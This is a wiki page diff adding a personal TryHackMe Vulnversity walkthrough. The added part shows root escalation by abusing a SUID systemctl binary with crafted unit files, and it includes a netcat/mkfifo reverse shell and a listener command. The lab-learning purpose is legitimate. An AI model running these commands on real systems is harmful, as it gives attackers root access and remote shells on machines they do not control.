Differences

This shows you the differences between two versions of the page.

--- prac_app_tryhackme [2022/09/24 18:50] – [TRY HACK ME] gman
+++ prac_app_tryhackme [2022/09/24 19:03] (current) – gman
@@ Line 2: / Line 2: @@
   * [[https://tryhackme.com/ | TryHackMe]]: Cyber security training through short, gamified, real-world labs. Content for complete beginners and seasoned hackers.
-====== Level 1 Headline ======
-===== Headline 2 =====
-==== Headline 3 ====
-=== Headline 4 ===
-== Headline 5 ==
-= Headline 6 =
-----
 ====== Vulnversity ======
@@ Line 80: / Line 61: @@
 </code>
-Then execute the .phtml file on the target machine:
+  * Then execute the .phtml file on the target machine:
 <code>http:[IP]:3333/internal/uploads</code>
@@ Line 100: / Line 81: @@
 **Discovered Vulnerability:** [[https://gtfobins.github.io/gtfobins/systemctl/ | systemctl is SUID root]]
+===== Exploit =====
 [[https://n0w4n.nl/vulnversity/ | n0w4n]]: He said we did not have perms to write in the default systemctl dir, so he created the unit file as an ENVIRONMENT VARIABLE.
   * First we create a variable which holds a unique file (on target machine).
-<code>
+<code>eop=$(mktemp).service</code>
+  * Then we create an unit file and write it into the variable. Inside the unit file we enter a command that will let the shell execute the command ''cat'' and redirect the output of ''cat'' to a file called ''output'' in the folder ''/tmp/''.
-</code>
-  * Then we create an unit file and write it into the variable.
 <code>
+echo '[Service]
+> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
+> [Install]
+> WantedBy=multi-user.target' > $eop
 </code>
-  *  Inside the unit file we entered a command which will let shell execute the command cat and redirect the output of cat to a file called output in the folder tmp.
-<code>
-</code>
   * And finally we use the /bin/systemctl program to enable the unit file.
 <code>
+/bin/systemctl link $eop
+# Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
+/bin/systemctl enable --now $eop
+# Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.
 </code>
   * Find it:
-<code>
-</code>
+<code>ls -lah /tmp</code>
+===== Alternative Exploit =====
 **To get a reverse root shell:**
+**NOTE:** the target machine is using netcat OpenBSD, NOT the traditional netcat. That means the -e (execute) flag will not work. See **Netcat (Traditional)** and **Netcat (OpenBSD)" (OpenBSD netcat removed the -e flag “for security” ([[https://kb.systemoverlord.com/security/postex/reverse/ | link]]).
+<code>
+# nc (openbsd):
+rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f
+</code>
   * Create your unit file:
 <code>
+echo '[Service]
+Type=oneshot
+ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;/bin/sh -i 2>&1 </tmp/f|nc $HOST $PORT >/tmp/f"
+[Install]
+WantedBy=multi-user.target' > gk.service
 </code>
   * Open a listener on your attack machine:
-<code>
-</code>
+<code>nc -lvnp 7777</code>
   * Link and start the service:
-<code>
+<code>
+/bin/systemctl link /tmp/gk.service         # need the full path
+/bin/systemctl enable --now /tmp/gk.service
 </code>
 Done.
+----